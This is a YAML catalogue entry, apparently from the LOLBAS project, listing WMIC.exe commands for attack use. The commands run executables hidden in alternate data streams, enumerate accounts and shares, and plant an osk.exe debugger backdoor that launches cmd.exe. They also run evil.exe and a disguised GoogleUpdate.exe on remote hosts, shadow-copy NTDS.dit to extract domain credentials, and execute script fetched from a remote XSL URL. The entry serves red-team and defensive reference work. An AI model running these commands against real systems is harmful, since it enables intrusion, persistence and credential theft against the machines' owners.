--- Name: WMIC.exe Description: Reconnaissance, Execute, Read ADS Author: '' Created: '2018-05-25' Categories: [] Commands: - Command: wmic.exe process call create calc Description: Execute calc.exe. - Command: wmic.exe process call create "c:\ads\file.txt:program.exe" Description: Execute a .EXE file stored as an Alternate Data Stream (ADS). - Command: wmic.exe useraccount get /ALL Description: List the user accounts on the machine. - Command: wmic.exe process get caption,executablepath,commandline Description: Gets the command line used to execute a running program. - Command: wmic.exe qfe get description,installedOn /format:csv Description: Gets a list of installed Windows updates. - Command: wmic.exe /node:"" service where (caption like "%sql server (%") Description: Check to see if the target system is running SQL. - Command: get-wmiobject –class "win32_share" –namespace "root\CIMV2" –computer "targetname" Description: Use the PowerShell cmdlet to list the shares on a remote server. - Command: wmic.exe /user: /password: /node: process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well. - Command: wmic.exe /node:"" process call create "evil.exe" Description: Execute evil.exe on the remote system. - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt" Description: Create a scheduled execution of C:\GoogleUpdate.exe to run at 9pm. - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit" Description: Create a volume shadow copy of NTDS.dit that can be copied. - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" Description: Execute a script contained in the target .XSL file hosted on a remote server. - Command: wmic.exe os get /format:"MYXSLFILE.xsl" Description: Executes JScript or VBScript embedded in the target XSL stylesheet. - Command: wmic.exe process get brief /format:"\\\c$\Tools\pocremote.xsl" Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet. Full Path: - c:\windows\system32\wbem\wmic.exe - c:\windows\sysWOW64\wbem\wmic.exe Code Sample: [] Detection: [] Resources: - https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory - https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html - https://twitter.com/subTee/status/986234811944648707 Notes: Thanks to Casey Smith - @subtee